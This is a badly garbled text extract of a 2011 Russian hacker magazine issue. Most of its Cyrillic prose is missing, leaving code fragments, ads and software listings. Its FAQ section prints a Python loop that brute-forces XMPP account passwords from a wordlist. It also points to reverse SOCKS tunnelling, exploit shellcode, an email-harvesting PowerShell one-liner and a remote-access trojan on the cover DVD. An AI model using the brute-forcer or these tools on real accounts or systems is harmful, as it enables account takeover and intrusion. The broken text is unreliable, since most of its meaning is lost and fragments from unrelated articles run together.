if(SDL_Init(SDL_INIT_VIDEO) == -1 )
{
printf(flog, "Fail with SDL_Init: %s.\n", SDL_GetError());
return 0;
}
atexit(SDL_Quit);
if(!(screen = SDL_SetVideoMode(VIDEO_X, VIDEO_Y,
32, SCREEN_FLAGS)))
{
fprintf(flog, "Fail with SDL_SetVideoMode: %s.\n",
SDL_GetError());
return 0;
}
return 1;
}

,
SMS.... , e .
:
int draw_image()
{
if(!(image = SDL_LoadBMP("/mtd_down/locker/fuckup.bmp")))
{
printf("Fail with LoadBMP: %s.\n", SDL_GetError());
X 06 /149/ 2011

SDL_BlitSurface() . .
, .

Internet@TV

Internet@TV -: AccuWether, Youtube, Twitter,


Facebook. Twitter: ,
.
Twitter, , , .
/mtd_down/common, WidgetMgr. cpdata1.dat
localId.dat. ,
:
# cat localId.dat
hm
1111 cpdata1.dat
# cat cpdata1.dat
Twitter HellMilitiaFuckUAll

: localId
e , .
login:pin:passwd_file.
c pdataN ( N e ,
),
. ,
-. z

133

UNITS
(oriyana@xpsycho.ru)
(andrushock@real.xakep.ru)

PSYCHO:

,
IQ,
100% . , ?
, , , ? . ? , , .
,
,
, , ,
, .

,
100%, - 7-10%, .
, , ,
, .
,
.


.
, .
,
,
, , .
. ,
, , ,
.
,
. :
,
, , ;
,
;
( ),

;

134

-,
;
, ;
(. ) , , -
( , ,
);
, , .
?
,
,
,
.
. , -.

, , - ,
. ,
, .

- , , , .
,
:
, .
, ,
:
( , , )
.
: ,
X 06 /149/ 2011


, , ,
. , .

(goo.gl/iuzQL).
, ( ). ,
: ,
,

()

,
(
- ), , , : , .
X 06 /149/ 2011


, ,
. , ,
. , ?
:
,
.
, (
!,
).
- ,
.
, !.
: , , ,
, .
- -

135

UNITS

,


(, ).
, .
, ? :)

, : ,
.

.
:
, - .

.
: ,
; 5 . , , ,
(. ). , , (
) , .


(lushertest.ru),
, ,
. , - . ,
, .

136

:
,
,
.

, .
:
,
:
, ,
, . , ,
. , ,
,
, .
, 5-10 , , .

,
, , , -


, ,
.
, , ,
.

X 06 /149/ 2011

, 10. -
. . ,
, .
,
,

, , .
. , ,
, ,
. :
, . -

, -
,

: (),
(), ,
, , ,
.

,


.

5,
, .

X 06 /149/ 2011

,
,
.
,
,

(
),

,
,

.

()
.

.
:
,
;
,
-,
,
,

.
,

-

.
: ,
.
, Aphex
Twin
,


: ,
, ,
,
, ,

Klangfarbe,

.

137

UNITS

,
, .
,
, ,
, ,
.
(
) (
).

. :
, -
, , ,
, . , ,
, ,
, ,
.

,
, : ,
, ,
, .
- , ,
, .
, .

.
, .
, . , ,
.

, ,
.
, ,
. ,
.
, - ,
- : , (
)
.

,
.
, , ,
, .
, , , . ,
, ,
, , .

, , , :
, ,
. , ,
?.
: ,
. ,
, ,
- (, ), , ,
.
,
,
, . ,
, .


,
5-7
. ,
, ; ; , -
, .
:
.

, , , , .
, ,
.

, , .
,

138


, .
,
( ).
:
, ,
.
, , , - ;
, , ,
(,
!): -, , -
(, );
- , ,
, , .
: , ,
:). z
X 06 /149/ 2011

1.
, ,
shop.
glc.ru.
2. .
3.

:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
! ,
.
.
,
.

500 .
12 2200 .
6 1260 .
,
!

+ + 2 DVD:
162
( 35% , )

12 3890 (24 )
6 2205 (12 )
? info@glc.ru
8(495)663-82-77 ( ) 8 (800) 200-3999 ( ,
, ).

UNITS
Step (twitter.com/stepah)

faq
united?

faq@real.xakep.ru
Q: -,
.exe-
Windows 7.
, ( milw0rm.
com) .
-,
Metasploit, Windows 7.
?
A:
-, security- Bkis (bit.ly/fXfbCH).
, , - 100% . ,
, -.

milw0rm.com, 100- -
SkyLined (code.google.com/p/w32-exec-calcshellcode), calc.exe 32- .

Q:
.
-

(

140

,
). ?
A: , . ,
Google Chrome ,
.
. ,
Google
Secbrowsing (bit.ly/hQNnVu),
.
Mozilla Firefox

Plugin Check (mozilla.com/en-US/
plugincheck),
-
. ,
.

Qualys BrowserCheck (browsercheck.qualys.
com). .

Secunia PSI (secunia.com/vulnerability_
scanning/personal). , ,
,

,

Q: ,
grep. ?
A: .
1. , grep
Windows .
GnuWin32 (gnuwin32.sf.net), Windows grep
(wingrep.com), GNU Grep For Windows (steve.
org.uk/Software/grep), Grep For
Windows (grepforwindows.com, pages.interlog.
com/~tcharron/grep.html) .
.
2. ( c XP)
, find findstr,
.
,
.
, .
:
echo findstr %1 %2 %3 %4 %5 >
%systemroot%\grep.cmd

%systemroot%,

, X 06 /149/ 2011

Project Ubertooth
Bluetooth-,
$100
. ,
grep, :

, Code
Coverage Analysis Tools Kcachegrind

(onInsert, onUpdate,
onRemov) .

C:\Windows\system32>netstat -an | grep LISTEN


C:\Windows\system32>findstr LISTEN
TCP 0.0.0.0:80

0.0.0.0:0

LISTENING

TCP 0.0.0.0:135

0.0.0.0:0

LISTENING

TCP 0.0.0.0:443

0.0.0.0:0

LISTENING

[...]

3. PowerShell
grep select-string.
xakep :
select-string .\*.* -pattern "xakep"

, select-string . ,
, C:\ txt-
,
:
get-childitem c:\ -include *.txt -rec \
| select-string -pattern \
"\w+@[a-zA-Z_]+?\.[a-zA-Z]{2,6}"

Q: - -? -
SQLite, -?
A: ,
, JavaScript.

, Taffy DB (taffydb.com).
JS-,
-.
SQL,
. :
;
;
10 ;
;
AJAX: JQuery, Dojo, Prototype, EXT
;
CRUD- (
Create, Read, Update, Delete);
;
;
X 06 /149/ 2011

Q: ,
. ?
A: JavaScript
Shortcuts Library (stepanreznikov.com/
js-shortcuts) , . ,
.
.
1. :
$.Shortcuts.add({
type: 'down',
mask: 'Ctrl+A',
handler: function() {
debug('Ctrl+A');
}
});

2. :
$.Shortcuts.add({
type: 'up',
mask: 'Shift+B',
handler: function() {
debug('Shift+B');
}
});

3. :
$.Shortcuts.start();

! ,
, ,
.
, Ctrl, Shift Alt.
:
: Ctrl, Shift, Alt;
: 09;
: AZ (case-insensitive);
: Backspace, Tab,
Enter, Pause, CapsLock, Esc, Space, PageUp,
PageDown, End, Home, Left, Up, Right, Down,
Insert, Delete, F1F12, , ,
.


( type),
:
down
;
up ;
hold (
,
).


.
: stepanreznikov.com/
js-shortcuts.

Q:
Windows,
Mac OS X, Dock,
.
, ,
. ?
A: Lion Skin Pack 3.0 For Seven
(hameddanger.deviantart.com/#/d3bg7fq).
, ,
,
Mac OS X Lion.

Q: ,
, ,
.
SOCKS-,
(
, -
).
SOCKS.
?
A: SOCKS (reverse) . sSocks
(sourceforge.net/projects/ssocks).
.

rcsocks, .
(, 1080)
(backconnect) -

141

UNITS

, (
1088) .

rssocks,
IP- (1080).
! , reverse-,

SOCKS- ( 1088)


(-, SSH- ).
: vimeo.
com/22515255.

Q: Jabber
(XMPP),
.
A:
THC-Hydra (thc.org/thc-hydra)
XMPP-. ,
,
XMPP, .
XMPP
Python
:
JID = name@server.org
for password in wordlist:
JID = xmpp.protocol.JID(JID)
client = xmpp.Client(
JID.getDomain(), debug=[])
conn = client.connect()
auth = client.auth(
JID.getNode(), password,
resource=JID.getResource())
if auth == 'sasl':
print password
sys.exit(1)
client.disconnect()

Q:

?
A: , - ,
-,
.
:
1. GMER (gmer.net);
2. RootRepeal (sites.google.com/site/
rootrepeal);
3. RkUnhooker (bit.ly/dOYgBO).
:
,
, ,
NTFS. , ,
, , ,
TCP/IP-.
SSDT/IDT/IRP.

142

Q:
,

? ,
- Pandora (pandora.com)?
,

IP. ?
- (, ,
) .
?
A: VPN-. ,
,
VPN
Amazon. ,
,
, IP-.
,

Free Hide IP (free-hideip.com).
,
.

Q: -
.
.

WinPcap,
.
A: RawCap (netresec.com/
?page=RawCap). 17 ,

DLL-.
.NET Framework 2.0. (
Wi-Fi) pcap-.
, Vista Windows 7
-
RAW-.

Q: ,
Bluetooth-
?

( Wi-Fi )
?
A: .
Wi-Fi, , , Bluetooth
.
ShmooCon 2011 ( bit.
ly/dJWAsC),
Ubertooth (ubertooth.sourceforge.
net). ? .

BT- ,
$1000. :


$100. Ubertooth One
Bluetooth- BT-.
,
.
, USB- ,
ARM Cortex-M3.
,
promiscuous,

Bluetooth-,
.
Kismet
(kismetwireless.net).

Q:
Windows
.
A: Code Coverage
Analysis Tools (github.com/Cr4sh/Codecoverage-analysis-tools)
Cr4sh.
PIN (pintool.org),

.

:
1. PIN
.
2. Coverager.dll
PIN.
3. execute_pin.bat
, PINPATH PIN.
4. BAT- :
execute_pin_calls.bat calc.exe

5.

CoverageData.log.<N>, <N>
, .

,
Calltree Profile Format:
python coverage_to_callgraph.py \
<log_file_path> <thread_number> [options]

6. Callgrind.out,

Kcachegrind (sourceforge.net/
projects/precompiledbin).
: esagelab.
ru/blog. z
X 06 /149/ 2011

>Net
Acrylic DNS Proxy
Connex Network Manager
ExpanDrive
Fiddler 2.3.3.3
freeSSHd 1.2.6
GDocsDrive
GeeMail
mRemote 1.50
MyEnTunnel 3.4.2.1
PuTTY Connection Manager
Royal TS 1.7.2

>Multimedia
8 Skin Pack 1.0 For 7
Gmail Notifier Pro 2.1
Lion Skin Pack 4.0 For Win 7
Marble 1.1.0
MPTagThat 2.0.4
Office Tabs 6.51
Pulse Beta 1
SmillaEnlarger 0.9.0
Songr 1.9.20
Swish 0.4.6
Tiny Burner1.0
Tunatic v1.0.1b

>Misc
CameraMouse2011
Depeche View 1.4.6
Ditto-cp 3.17
Dolphin Text Editor Menu 1.8
Duplicate Commander 2.1
Explorer7Fixes 1.0.0.2
FluffyApp 1.0b9
Free Time Tracker 1.0
GeeTeeDee 0.1.175
iPrint 6
Klok Free 2.3.2
MadAppLauncher 1.0.0.0
min.us for windows
Orbit Downloader 4.1.0.0
Shapeshifter 4.01
SnakeTail 1.3
Windows Double Explorer 0.4

>Devel
AutoGen 5.11.5
Bashdb 4.2-0.7
Boa Constuctor 0.2.3
CVS 1.11.23

>>UNIX
>Desktop
Audacious 2.5.0
Blender 2.57
DraftSight
Fvwm 2.6.0
GIMP 2.7.2
Kdenlive 0.8.0
Kupfer 2.06
Marble 1.1
Notecase 1.9.8
Pdfmod 0.9.1
PyBookReader 0.5.0
Rawstudio 2.0
SnapFly 0.8
SSHMenu 3.18
TaskJuggler 0.0.11
Texmaker 3.0.2
ThinkingRock 2.2.1
UMPlayer 0.92

>System
Comodo Antivirus for Windows
Comodo Firewall for Windows
Dropboxifier v0.1.6
Folder Size 1.9.0.0
Free VM Configuration Tool 1.0
FreeFileSync 3.16
MyEventViewer 1.55
Q-Dir 4.54
SafeHouse Explorer 3.01
WhatIsHang 1.00

>Security
DarkComet-RAT v3.3 FWB
DB Audit 4.2.29
Google Hack Database 1.1
Hakit Proxy v1
PANFinder
PVDasm v1.7b
RawCap
REC Studio 4
Retina Scaner 5.12.1
SWFREtools
TCHunt v1.5
V3RITY Data Block Examiner for
Oracle
Vistumbler v10.1 beta 5
Volatility 1.3Beta
Watcher 1.5.2
Windows Credentials Editor v1.2

streamwriter 2.0.0.0
TeraTerm Pro Web 3.1.3
Tunngle 4.3.2.0
UltraVNC 1.0.9.5
USBWebserver V8
Wireshark 1.4.6
Yakoon 2.0.0

>Server
Apache 2.2.17
BIND 9.8.0
Boa 0.94.13
CUPS 1.4.6
DHCP 4.2.1
Dnsmasq 2.57

>Security
ArpON 2.0
BeEF 0.4.2.4 alpha
BFBTester 2.0.1
BodgeIt 1.1.0
Cameloid 1.8c
DNSpoison 1.0
Google Hack DB Tool 1.1
Hatkit Proxy 0.5.1
Netifera 1.0
oclHashcat lite 0.05
Portsentry 1.2
Pytbull Testing Framework 0.3
Sqlmap 0.9
sslsnoop 0.6
SWFRETools
theHarvester 2.0
Yersinia 0.7.1
Zed Attack Proxy 1.2.0

>Net
Autossh 1.4b
Bandwidthd 2.0.1
BitlBee 3.0.2
BitStormLite 0.2q
Bit-Twist 1.1
Cftp 0.12
Dante 1.2.3
Dns2tcp 0.5.2
dnsproxy 1.16
ffproxy 1.6
Firefox 4.0.1
Google Chrome 11.0.696.57
Jabberd 2.2.13
Knockd 0.5
NOC 0.6.3
Opera 11.10
Psi 0.14
Skype 2.2

>Games
Family Farm

DDD 3.3.12
Groovy 1.8
HT 2.0.18
Indent 2.2.9
libvirt 0.9.0
LLVM 2.9
NetBeans 7.0
PCC 1.0
Pydb 1.26
PyPy 1.5
QtSDK 1.1
SPE 0.8.4
Tapper
XtraBackup 1.6

>>MAC
Blender 2.57b
BlueGriffon 1.0pre1
Bricksmith 2.5
EasyFind 4.7.2
eMaps 2.2.5
Firefox 4.0.1
Google Chrome 11.0.696.57
Growl 1.2.1
Gruml 0.9.25.121
ipswDownloader 0.4
Pashua 0.9.4.5
Silverlight 4.0.60310.0
SmartSVN 6.6.7
TenFourFox 4.0.1
TeXMaker 3.0.2
TeXShop 2.41
The Unarchiver 2.7.1
xACT 2.11
XMenu 1.9.3
YoruFukurou 2.4

>X-distr
CentOS 5.6

>System
Alsa 1.0.24
Bochs 2.4.6
ClusterSSH 3.28
Conky 1.8.1
Cupt 2.0.0
Linux Kernel 2.6.38.5
Loggerfs 0.5
NetXMS 1.0.11
QKernelBuilder 1.2
Sadms 2.0.15
SystemTap 1.4
Watsup 1.9
Xnee 3.09

Exim 4.75
nginx 1.0.0
Nut 2.6.0
OpenLDAP 2.4.25
OpenSSH 5.8
OpenVPN 2.2.0
Postfix 2.8.2
PostgreSQL 9.0.4
Samba 3.5.8
Sendmail 8.14.4
Snort 2.9.0
Squid 3.1.12

/ C *NIX

06(149) 2011

>>WINDOWS
>Development
Aptana Studio 3.0.1
Assembly Studio 1.0
Bamcompile 1.21
CodeCompare 2.60.5
HexAssistant 2.7
IncrediBuild 3.51
NetBeans 7.0
PE Explorer
PowerGUI 2.4.0
Programmers Notepad 2.2
py2exe 0.6.9
Python Tools for Visual Studio
Beta2
Qt Creator 2.2
Selenium IDE 1.0.10
SQL Decryptor 1.1.0
Titanium Developer
x 06 (149) 2011
149

PHP

. 106

HTML5



: 2
10
.

Silverlight:
BlackHole exploit kit
CISCO
UAC

WEB-
Linux
. 56

*NIX-

06 (149) 2011

GOOGLE CHROME . 62

UNITS

HTTP://WWW2

DUSHARE
dushare.com

URLQUERY
urlquery.net

- ,
rapidshare.com,
. .

. dushare. ,
. Flash, dushare
(P2P),
-. , ,
.
.

-
, . urlQuery , ,
Java- HTTP-.
, .
:
-
.
, .

INSTAPAPER
instapaper.com

CODECANYON
codecanyon.net

, . : ?
, ,
Instapaper.
( Read later)
.
,
-,
(iPad/
iPhone, Kindle).

,

. , .
, , . CodeCanyon
- (JavaScript, PHP Scripts, .NET, Plugins, CSS, HTML5)
(iOS, Android). :
JS, $5, 1065
. CodeCanyon
. .

144

X 06 /149/ 2011


90

.
210
:

PWN2OWN: . 82

05 (148) 2011

VOIP

5 DVD


VOIP-
. 60

PHREAKING
. 130

Linux USB-
Red.Button:
Twitter

MS08- 067:
WINDOWS
. 68

=90
www.xakep.ru/podpiska